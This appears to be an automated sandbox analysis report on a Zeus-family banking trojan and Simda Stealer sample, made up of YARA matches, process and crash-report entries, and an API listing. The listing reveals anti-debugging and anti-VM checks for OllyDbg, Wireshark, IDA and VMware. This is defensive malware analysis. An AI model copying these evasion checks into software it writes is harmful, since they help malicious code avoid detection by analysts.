Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2474596414.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3272240736.00000000028C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2039049974.000000000088E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:42:45
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:42:45
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:42:45
Start date:	23/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	12:42:45
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4268 -ip 4268
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:42:45
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:42:46
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 984
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:42:46
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4672 -ip 4672
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:42:47
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 708
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:42:47
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:42:48
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6980 -ip 6980
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:42:48
Start date:	23/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:42:48
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:42:48
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 976
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:42:48
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6300 -ip 6300
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:42:49
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6300 -s 744
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:42:50
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:42:51
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6648 -ip 6648
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:42:51
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:42:51
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5168 -ip 5168
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:42:51
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:42:51
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5616 -ip 5616
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:42:52
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:42:52
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2672 -ip 2672
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001B.00000002.2477343804.0000000002DA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3436 -ip 3436
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4764 -ip 4764
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3656 -ip 3656
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:42:53
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:42:54
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4460 -ip 4460
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:42:54
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2535425288.00000000028C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:42:54
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2212 -ip 2212
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	12:42:54
Start date:	23/08/2024
Path:	C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe"
Imagebase:	0x1f0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:42:54
Start date:	23/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2180 -ip 2180
Imagebase:	0x710000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70.2%
Total number of Nodes:	275
Total number of Limit Nodes:	11

Executed Functions

Function 00402B70 Relevance: 68.4, APIs: 30, Strings: 9, Instructions: 163
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401000: IsDebuggerPresent.KERNEL32 ref: 00401014
Part of subcall function 00401000: FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
Part of subcall function 00401000: memset.MSVCRT ref: 0040104B
Part of subcall function 00401000: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Part of subcall function 00401000: Process32First.KERNEL32 ref: 00401071
Part of subcall function 00401000: StrStrIA.KERNELBASE(?,wireshark.exe), ref: 0040108D
Part of subcall function 00401000: Process32Next.KERNEL32(00000000,?), ref: 0040109D
Part of subcall function 00401000: GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
Part of subcall function 00401000: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004010CB
Part of subcall function 00401000: PathFileExistsA.KERNELBASE(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

LoadLibraryA.KERNEL32(user32.dll), ref: 00402B86
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402B9A

Part of subcall function 00403920: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403953
Part of subcall function 00403920: strstr.MSVCRT ref: 00403967
